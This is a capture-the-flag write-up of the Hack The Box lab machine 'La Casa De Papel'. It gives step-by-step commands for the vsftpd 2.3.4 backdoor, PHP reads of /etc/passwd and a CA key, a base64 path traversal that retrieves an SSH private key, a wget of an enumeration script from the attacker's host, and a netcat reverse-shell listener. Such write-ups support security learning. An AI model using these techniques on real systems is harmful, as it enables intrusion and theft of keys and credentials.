HTB – La Casa De Papel

Alright, here we go!

It’s Wednesday night. I have tonight and tomorrow, then this box is being retired on Saturday!

I’ve done some tweeting, tried to make it a group activity! (https://twitter.com/Yekki_1/status/1154075821759500288)

However, for now, it’s just me!

First off, what the heck is La Casa De Papel? Google tells me it’s a Spanish heist TV show, available on Netflix!

Once this box is done, that is getting a watch!

First off, let’s run an nmap:

nmap -sC -sV -T4 -oA nmap/nmap 10.10.10.131

The results are in and we have 4 ports open!

Both 80 and 443 are web servers running nodeJS.

Let’s start with port 80:

There is a QR code. Let’s try scanning it!

As I thought: “token couldn’t be read!” So it’s not a legit QR code. Let’s download it and see if strings brings back anything.

Nothing that makes sense yet. Let’s save that for later!

Within the page code, we do get some bits for the QR code:

}</style></head><body><div><form method="POST"><input type="image" src="/qrcode?qrurl=otpauth%3A%2F%2Fhotp%2FToken%3Fsecret%3DHB4HUKBMLN2XK22WKNJXOJDWKU5GCSZV%26algorithm%3DSHA1" readonly="readonly" onclick="return false"><input name="secret" type="hidden" value="HB4HUKBMLN2XK22WKNJXOJDWKU5GCSZV"><input name="token" type="text" placeholder="ONE PASSWORD" autocomplete="off"><a target="_blank" href="https://support.google.com/accounts/answer/1066447?co=GENIE.Platform%3DAndroid&amp;hl=en&amp;oco=0">Install Google Authenticator</a><input name="email" type="email" placeholder="E-MAIL" autocomplete="off"><button>GET FREE TRIAL</button></form></div></body></html>

The token secret might be interesting

Let’s get a gobuster running while we carry on poking about!

gobuster -u http://10.10.10.131 -w /usr/share/wordlists/rockyou.txt

So port 443, what wonders do you behold?

A very specific, user-added certificate error:

Looking at the certificate itself, it looks like it’s only valid for lacasadepapel.htb

Off to our hosts file we go!

editing /etc/hosts and adding in:

10.10.10.131 lacasadepapel.htb

Going back to the website via the new hostname, it still brings back the same error.

Let’s get a gobuster going here too! This is slightly harder as we get the error

So we need the -k flag to skip SSL certificate verification:

gobuster -u https://lacasadepapel.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

We get a result that a wildcard response is found and that we should specify the -fw switch to force the process. Doing this just brings back every path as a 302.

Rather than ignoring just 302s, why don’t we accept only status 200s.

gobuster -u https://lacasadepapel.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -fw -s 200

That’s now happily running through.

While they are running, shall we look closer at the FTP service. Does that allow anonymous logins?

root@oblivion:~/Documents/htb/casa# ftp 10.10.10.131
Connected to 10.10.10.131.
220 (vsFTPd 2.3.4)
Name (10.10.10.131:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> ls
530 Please login with USER and PASS.
ftp: bind: Address already in use
ftp> exit
221 Goodbye.

It does not!

My feeling is we need a username and password from port 80, to get a certificate from port 21 to view port 443.

While we are waiting for the gobusters to finish. let’s run a full port scan.

Nothing on any of them.

So I guess we need to get a cert somehow. Can we create our own cert and get that to be used?

I wouldn’t say so, as any certificate that we create won’t be signed by the certificate authority, so it won’t have that chain of trust, resulting in it not working.

Instead looking at the headers that are returned in burp, for both port 80 & 443 we see what we got told about in the nmap scan:

HTTP/1.1 401 Unauthorized 
X-Powered-By: Express 
Content-Type: text/html; charset=utf-8 
Content-Length: 931 
ETag: W/"3a3-ltZ9andWBAdO1mJpoSYlrCWcCP0" 
Date: Wed, 24 Jul 2019 18:09:17 GMT 
Connection: close

Both pages are being powered by Express, which is a NodeJS module.

Looking around the internet, we find this and this. These indicate that there is a way to get RCE from anything running Express.

Let’s give them a look through and see what we would need to do!

Going through those steps just returns nothing. The QR code is the only valid URL with a “?” to start on, and that doesn’t work.

I’ve had a break and still no idea. A quick look on the forums says that the initial foothold might be through the FTP server.

We know it’s not anonymous login, so let’s take a deeper look using:

https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b

The metasploit module of ftp_version looks interesting. Let’s set that up

msfconsole

use auxiliary/scanner/ftp/ftp_version

show options

Set the RHOSTS

set RHOSTS 10.10.10.131

run

We get a banner back with some interesting information.

Annoyingly, looking back at our nmap scan we started with, we had that information!

So a searchsploit for vsftpd gives us some results.

The last one is what we want, command execution! So let’s boot Metasploit back up and take a look:

search vsftpd

use exploit/unix/ftp/vsftpd_234_backdoor

show payloads

set PAYLOAD cmd/unix/interact

run

Running this we get a successful message. We run it again and get a more interesting message.

Well we saw this port earlier on our full nmap scan but it was filtered. Looks like we might have just opened it up.

What this module is doing is entering a username with a “:)” in it. This opens the backdoor.

Trying with a web browser doesn’t load anything.

Giving it a go with FTP however!

Running whoami / pwd / ls etc all bring back errors. A quick help and we get:

Having a poke about with help from a good friend!

We manage to do an ls giving us the variables available

Tokyo looks pretty exciting. Let’s see if we can dump that out!

show $tokyo

So we know there is stuff there.

Looking at this, can we run any php code?

echo "test"

We get a result of test, so we can run PHP code in this shell.

Looking at phpinfo() we find out that a whole bunch of useful stuff is disabled:

So we can’t run shell_exec or any of that juicy stuff. However, we must be able to read files: the PHP code above gets file contents, so why can’t we?

file_get_contents('/etc/passwd')

So, shall we see what the code was looking at earlier

file_get_contents('/home/nairobi/ca.key')

We have a ca key!

Now that we have this, we can copy it across to our local box and save it as rootca.key. Then we need to make a new certificate!

Before that, lets take a quick look to see what else is around

scandir('/home/nairobi')

No user.txt sadly!

However we can do:

scandir('/home')

After a bit of poking around, the user.txt file is in /home/berlin, but sadly we don’t have permission for that.

We can use openssl for this:

openssl req -new -key rootca.key -out lacasadepapel.htb.csr

Questions will be asked, so let’s look at the certificate on the website to get the answers that we can.

So we now have a csr. Hopefully with this and the key we can create a client certificate.

Looking round the net, I think we might have a command:

openssl x509 -req -days 365 -in lacasadepapel.htb.csr -signkey rootca.key -sha256 -out lacasadepapel.crt

That ran through properly, we now have bingo.crt.

Let’s add this cert to our cert store and see if we can access the website on port 443.

I think my bingo was too keen! Far too keen!

So the error we are getting is “peer certificate issuer is not recognized”.

After some more playing, we get issues that it’s a self-signed certificate, and it also looks like the browsers aren’t using my certificate, they are using the host’s ones.

What I forgot was to create a client certificate: we need both the key and the crt in the same file, then turn that into a .p12.

So using nano we put the files together. With the ca.key on the top then the created crt below.

openssl pkcs12 -export -in ca.txt -out lacasadepapel.p12

This then creates a p12 certificate, which can be added to your local certificates in firefox.

Loading the website then asks for the cert; give it that one and boom!

Looking around, we have seasons 1 and 2 and each have an avi file.

Each of the avi files had a URL of something like:

https://lacasadepapel.htb/file/U0VBU09OLTIvMDEuYXZp

This to me looks suspect, why wouldn’t it just be the episode number?

Putting that through a base64 decoder we get:

SEASON-2/01.avi

Useful. Also, trying to change the path to SEASON-2 from:

https://lacasadepapel.htb/?path=SEASON-2

to

https://lacasadepapel.htb/?path=../../../../../../../../etc/passwd

Gives us an error:

Error: ENOTDIR: not a directory, scandir '/home/berlin/downloads/../../../../../../etc/passwd/'
at Object.fs.readdirSync (fs.js:904:18)
at /home/berlin/server.js:10:20
at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)
at next (/home/berlin/node_modules/express/lib/router/route.js:137:13)
at Route.dispatch (/home/berlin/node_modules/express/lib/router/route.js:112:3)
at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)
at /home/berlin/node_modules/express/lib/router/index.js:281:22
at Function.process_params (/home/berlin/node_modules/express/lib/router/index.js:335:12)
at next (/home/berlin/node_modules/express/lib/router/index.js:275:10)
at expressInit (/home/berlin/node_modules/express/lib/middleware/init.js:40:5

So it looks like it’s looking for items in downloads. Now from earlier we know the user.txt is in /home/berlin, so can we base64 ../user.txt? Which gives us:

Li4vdXNlci50eHQ=

Trying this out we get:

https://lacasadepapel.htb/file/Li4vdXNlci50eHQ=

Which downloads a file, called user.txt

Boom, we have the user flag!

I am so very glad we finally got here!

Now, to get access to the box, I really hope this user has ssh keys!

Let’s go back to the Psy Shell and see what’s in the Berlin home directory to see what could be useful

There is a .ssh folder, let’s see if authorized_keys is there

That might be useful, although we don’t currently have the public key. Also the comment is odd:

thek@Thekmac.local

How odd

Another file we know is there is server.js. Let’s take a look at this; it has a very interesting line:

This means that we might be able to look at folders! Let’s try it

https://lacasadepapel.htb/?path=../

Yesssss! So we can now enumerate the folders and files! This is ace!

Looking in the .ssh folder we have:

authorized_keys
id_rsa
id_rsa.pub
known_hosts

Let’s grab all of these.

So id_rsa is a private key with the comment of berlin@lacasadepapel.htb

The id_rsa.pub is the public key.

Let’s try the private key

ssh -i id_rsa berlin@10.10.10.131

We get asked for a password, hmm.

Might as well try all users before we look into how to get the public key onto the machine.

OMG, boom! Ok that was unexpected!

We have a shell, as professor.

So never trust the comments on CTFs!

The shell is odd though. Looking at /etc/passwd it’s an “ash” shell.

I get excited by getting shells, some people on the other hand, just enjoy mocking!

Let’s try and upgrade that to bash!

python -c 'import pty;pty.spawn("/bin/bash")'

This for the first time in my life, didn’t do anything! How odd!

Looking in /etc/ there is os-release, we are running:

NAME="Alpine Linux"
ID=alpine
VERSION_ID=3.8.1
PRETTY_NAME="Alpine Linux v3.8"
HOME_URL="http://alpinelinux.org"
BUG_REPORT_URL="http://bugs.alpinelinux.org"

Never heard of it. The website claims it’s “a security-oriented, lightweight Linux distribution”.

This version was released on 11-09-2018 so not too old but not fully new either.

As always though, let’s get LinEnum.sh on it and see what we find.

Copying it across from my local box using a SimpleHTTPServer

python -m SimpleHTTPServer 9000

wget 10.10.14.33:9000/LinEnum.sh -O /tmp/LinEnum.sh

Let’s run that and see what happens.

The permissions on the home directories are odd:

The user of nobody owns 2 of the home directories. Strange

There is also an interesting process running

nobody is running it, but in the professor home directory.

In the home directory we have:

lacasadepapel [~]$ ls -al
total 24
drwxr-sr-x 4 professo professo 4096 Mar 6 20:56 .
drwxr-xr-x 7 root root 4096 Feb 16 18:06 ..
lrwxrwxrwx 1 root professo 9 Nov 6 2018 .ash_history -> /dev/null
drwx------ 2 professo professo 4096 Jan 31 21:36 .ssh
-rw-r--r-- 1 root root 88 Jan 29 01:25 memcached.ini
-rw-r----- 1 root nobody 434 Jan 29 01:24 memcached.js
drwxr-sr-x 9 root professo 4096 Jan 29 01:31 node_modules


So memcached.ini is owned by root but I can read it:

[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js

Whereas memcached.js group is nobody and I can’t read that one.

So I guess I need to try and become nobody to succeed here.

I can’t run sudo -u as I don’t know the passwords. Let’s see if we can see what’s going on here using pspy

pspy64s just wouldn’t run, so I went back to the github page and downloaded the 32bit one which ran.

Running it didn’t show a lot that we hadn’t kinda guessed:

The UID of 65534 is nobody. So nobody is running that command pretty often.

So what is this doing, what is /usr/bin/node?

It looks like that’s the NodeJS binary, and it’s running memcached.js, which makes sense. This will all be via the .ini file, so let’s take a look at that.

We can’t edit it, so that’s out straight away. We get permission denied.

It seems like the right method though. Everything else is hanging off node here. Let’s take a look at that

If we do /usr/bin/node we get a nodejs shell. A quick google found out how to write a file:

const fs = require('fs');
fs.writeFile("/tmp/test", "Hey there!", function(err) {
    if (err) {
        return console.log(err);
    }
    console.log("The file was saved!");
});

Trying this works and creates a file called test which when read says “Hey there!”.

So, can we over-write the memcached.js file? Let’s create a basic file that should echo something to temp:

const fs = require('fs');
fs.writeFile("/home/professor/memcached.js", "echo 'Winning!' > /tmp/wins", function(err) {
    if (err) {
        return console.log(err);
    }
    console.log("The file was saved!");
});

Bugger!


Looking again at the permissions on /home/ we notice that the professor directory has the permissions of

drwxr-sr-x

The s in the group slot is odd. Normally it would be x for execute. So what is the “s” in Linux permissions?

In the group position this is the setgid bit. On a binary it makes the program run with the owning group; on a directory it makes new files inherit the directory’s group rather than the creating user’s primary group. It does not by itself grant us anything. What matters here is the first triple: the directory is owned by professo with rwx, and creating or deleting a file is governed by write permission on the directory, not on the file itself, so we can remove the root-owned memcached.js (and memcached.ini) even though we can’t read or edit them.

On the off chance, after reading a forum explaining it here: https://www.linuxquestions.org/questions/linux-newbie-8/what-is-s-instead-of-x-in-the-file-permission-when-i-look-at-usr-bin-chsh-223386/, it said we might be able to use rm with the s permission.

Looking at that, I ran rm memcached.js and guess what! It’s gone!

So let’s create a file that creates a file in temp

So let’s wait for that job to run again and see if the file gets created. If it does, we can then put in some sort of shell command and hopefully get some priv-esc!

That job didn’t appear to run again, I’m not sure why, but the file never got created.

I have sadly, run out of time and awakeness. So this is a box that will remain unrooted.

I’m sure i’ll see on Saturday just how very close I was to this!


*********Post Retirement**********

So the box got retired and unfortunately I didn’t manage to root it in time!

Rather than prodding around, I watched IppSec’s video and I was so very close!

The fact that we changed the .js file, not the .ini, was the issue. We also would have had to keep the format, so we wanted to make a new memcached.ini with something like:

We set up a listener on our local box

nc -nvlp 9002

Then we wait for the connection back! Nothing happens. So the command isn’t being run.

We instead need to tell it what bash to use, so we add in a few words:

After only a couple of minutes, we get a shell back!

So we were very close. We got the idea of the directory permissions, just didn’t quite push it over that line. I think we would have got there.

What annoys me slightly is watching the pspy and not seeing the cronjob being run, I’m not sure what happened there!

All in all, a fun 2 day box! The SSL cert was frustrating due to my own failures, but other than that I really enjoyed it. I especially liked the easy but very important webapp directory listing and reading of file contents.
